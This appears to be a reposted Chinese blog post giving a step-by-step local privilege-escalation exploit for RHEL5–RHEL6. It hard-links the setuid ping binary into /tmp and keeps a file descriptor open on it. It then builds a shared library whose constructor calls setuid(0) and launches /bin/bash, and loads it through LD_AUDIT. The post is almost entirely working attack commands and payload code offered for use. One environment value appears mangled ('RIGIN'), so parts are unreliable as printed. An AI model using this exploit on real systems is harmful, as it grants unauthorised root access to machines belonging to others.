普通用户提权

  • A+
所属分类:安全文章

说明:RHEL5—RHEL6下  都可以提权


1. ls -ld /tmp/

 普通用户提权


2. ls -l /bin/ping

 普通用户提权


3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target

 普通用户提权


4. exec 3< /tmp/exploit/target ;  rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3


 普通用户提权


 普通用户提权 


5. vim payload.c

   void __attribute__((constructor)) init()

   {

    setuid(0);

    system("/bin/bash");

   }


 普通用户提权

 

6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit

 普通用户提权



7. LD_AUDIT="RIGIN" exec /proc/self/fd/3

 普通用户提权



本文始发于微信公众号(飓风网络安全):普通用户提权

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: